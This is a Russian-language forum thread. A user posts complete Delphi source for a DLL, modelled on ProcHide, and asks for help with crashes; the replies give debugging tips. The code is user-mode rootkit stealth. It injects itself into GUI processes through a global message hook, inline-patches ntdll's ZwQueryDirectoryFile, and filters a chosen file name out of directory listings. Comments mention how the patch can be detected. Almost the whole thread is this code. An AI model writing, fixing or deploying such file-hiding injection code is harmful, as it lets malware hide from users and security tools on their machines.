Всем привет! Ниже код перехвата указанного процесса, по примеру ProcHide (писал Ms-Rem) с этого ресурса. Проблема: при запуске, сыпет ошибки чтения памяти и грохается explorer.exe Помогите разобраться. Код (Text):
// Hide.dll: installs an in-process inline hook on ntdll!ZwQueryDirectoryFile that
// filters directory entries named 'UUU.UUU' out of FILE_BOTH_DIRECTORY_INFORMATION
// (class 3) results, and registers a system-wide WH_GETMESSAGE hook whose handler
// does nothing of its own (see MessageProc) — the hook exists to get this module
// mapped into other GUI processes, where DLLEntryPoint then re-applies the patch.
//
// Host-observable artifacts, all visible in the code below: a named mutex
// 'ProcHideHook'; a global message hook registered with this module's HInstance;
// and the first bytes of ZwQueryDirectoryFile in the process's ntdll mapping being
// overwritten in place with a push/ret stub. Comparing in-memory ntdll export
// prologues against the on-disk image is the natural way to spot that patch.
library Hide;

uses Windows, NativeAPI,Dialogs,SysUtils;

type
  // Backup of the original bytes at the hooked entry point (dword + word).
  OldCode = packed record
    One: dword;
    two: word;
  end;

type
  // Hand-written layouts for the ZwQueryDirectoryFile output classes. Only
  // FILE_BOTH_DIRECTORY_INFORMATION is used below; NextEntryOffset is the
  // byte distance to the next entry, 0 marking the last one.
  FILE_DIRECTORY_INFORMATION = packed record
    NextEntryOffset: ULONG;
    Unknown: ULONG;
    CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64;
    FileAttributes: ULONG;
    FileNameLength: ULONG;
    FileName: PWideChar;
  end;
  PFILE_DIRECTORY_INFORMATION = ^FILE_DIRECTORY_INFORMATION;

type
  FILE_FULL_DIRECTORY_INFORMATION = packed record
    NextEntryOffset: ULONG;
    Unknown: ULONG;
    CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64;
    FileAttributes: ULONG;
    FileNameLength: ULONG;
    EaInformationLength: ULONG;
    FileName: PWideChar;
  end;

type
  FILE_BOTH_DIRECTORY_INFORMATION = packed record
    NextEntryOffset: ULONG;
    Unknown: ULONG;
    CreationTime, LastAccessTime, LastWriteTime, ChangeTime, EndOfFile, AllocationSize: int64;
    FileAttributes: ULONG;
    FileNameLength: ULONG;
    EaInformationLength: ULONG;
    AlternateNameLength: ULONG;
    AlternateName: array [0..11] of WideChar;
    FileName: PWideChar;
  end;
  PFILE_BOTH_DIRECTORY_INFORMATION = ^FILE_BOTH_DIRECTORY_INFORMATION;

type
  FILE_NAMES_INFORMATION = packed record
    NextEntryOffset: ULONG;
    Unknown: ULONG;
    FileNameLength: ULONG;
    FileName: PWideChar;
  end;

  // The patch stub written over the entry point: `push imm32` ($68 + address)
  // followed by `ret` ($C3), i.e. an absolute jump to NewZwQueryDirectoryFile.
  // With a 4-byte pointer this is 6 bytes, the same size as OldCode.
  far_jmp = packed record
    PuhsOp: byte;
    PushArg: pointer;
    RetOp: byte;
  end;

var
  JmpZwq: far_jmp;   // stub bytes written over the entry point
  OldZwq: OldCode;   // original bytes saved by SetHook
  PtrZwq: pointer;   // address of ntdll!ZwQueryDirectoryFile in this process

// Direct import of the native API being hooked.
Function ZwQueryDirectoryFile(FileHandle: dword; Event: dword; ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall; external 'ntdll.dll';

// Calls the unhooked original: temporarily restores the saved bytes, calls
// through, then re-applies the stub. INVALID_HANDLE_VALUE (-1) is the
// current-process pseudo-handle, so both writes patch this process's own
// ntdll mapping. Note the restore/call/re-patch sequence is not serialised
// against other threads entering the hooked function at the same time.
Function TrueZwQueryDirectoryFile(FileHandle: dword; Event: dword;
  ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall;
var
  Written: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Written);
  Result := ZwQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Written);
end;

// Replacement entry point. Runs the real call, then, for class 3 results that
// succeeded, walks the linked entries and unlinks any whose FileName matches
// 'UUU.UUU' (case-insensitive) by widening the previous entry's NextEntryOffset.
// Returns the original call's status unchanged.
Function NewZwQueryDirectoryFile(FileHandle: dword; Event: dword; ApcRoutine: pointer; ApcContext: pointer; IoStatusBlock: pointer; FileInformation: pointer; FileInformationLength: dword; FileInformationClass: dword; ReturnSingleEntry: bool; FileName: PUnicodeString; RestartScan: bool): NTStatus; stdcall;
var
  Info, Prev: PFILE_BOTH_DIRECTORY_INFORMATION;
begin
  Result := TrueZwQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
  if (FileInformationClass = 3) and // FILE_BOTH_DIRECTORY_INFORMATION
     (Result = STATUS_SUCCESS) then
  begin
    info:=PFILE_BOTH_DIRECTORY_INFORMATION(FileInformation);
    // The glitch is somewhere around here.... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    while(Info^.NextEntryOffset > 0) do
    begin
      Prev := Info;
      Info := pointer(dword(Info) + Info^.NextEntryOffset);
      if lstrcmpiw(Info^.FileName, 'UUU.UUU') = 0 then
        Prev^.NextEntryOffset := Prev^.NextEntryOffset + Info^.NextEntryOffset;
    end;
  end;
end;

// Resolves ZwQueryDirectoryFile in the already-loaded ntdll, saves its first
// SizeOf(OldCode) bytes into OldZwq, builds the push/ret stub and writes it
// over the entry point. Return values of the Read/Write calls are not checked.
Procedure SetHook();
var
  Bytes: dword;
begin
  PtrZwq := GetProcAddress(GetModuleHandle('ntdll.dll'), 'ZwQueryDirectoryFile');
  ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
  JmpZwq.PuhsOp := $68;
  JmpZwq.PushArg := @NewZwQueryDirectoryFile;
  JmpZwq.RetOp := $C3;
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes);
end;

// Puts the saved original bytes back (called on DLL_PROCESS_DETACH).
Procedure Unhook();
var
  Bytes: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
end;

// stub / placeholder
// WH_GETMESSAGE handler: forwards to the next hook in the chain but ignores
// CallNextHookEx's result and always returns 0.
Function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall;
begin
  CallNextHookEx(0, Code, wParam, lparam);
  Result := 0;
end;

// Thread body: registers MessageProc as a system-wide (thread id 0) message
// hook owned by this module, then parks the thread forever so the hook stays
// registered. The HHOOK is discarded, so it is never unhooked.
Procedure SetGlobalHookProc();
begin
  SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
  Sleep(INFINITE);
end;
//
// Starts the hook thread from one instance only: the named mutex 'ProcHideHook'
// is used as the "already running" marker — GetLastError = 0 is presumably read
// as "mutex newly created"; otherwise the handle is closed and nothing happens.
Procedure SetGlobalHook();
var
  hMutex: dword;
  TrId: dword;
begin
  hMutex := CreateMutex(nil, false, 'ProcHideHook');
  if GetLastError = 0 then
    CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId)
  else
    CloseHandle(hMutex);
end;

// DllMain replacement: on attach, arm the global hook and patch ntdll in this
// process; on detach, restore the patched bytes. The initialization section
// below also calls it directly with DLL_PROCESS_ATTACH.
procedure DLLEntryPoint(dwReason: DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH:
      begin
        SetGlobalHook();
        SetHook();
      end;
    DLL_PROCESS_DETACH:
      begin
        Unhook();
      end;
  end;
end;

begin
  DllProc := @DLLEntryPoint;
  DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
Отладчик зачем придумали? Перехватывай у себя в процессе для удобства и работай с файлами. Так проще всего под олькой разглядеть, где косяк.
SizeOf(OldCode) у меня под дизасмом твой код переписывает несколько метров кода. Что за сайзоф? явно размер задать никак, например 5 байт или 10?
Спасибо большое за помощь, на выше приведённой ветке я нашёл рабочий код. Как сказано там: "Klayd, вот это помог, спасибо большое! Respect и уважуха!"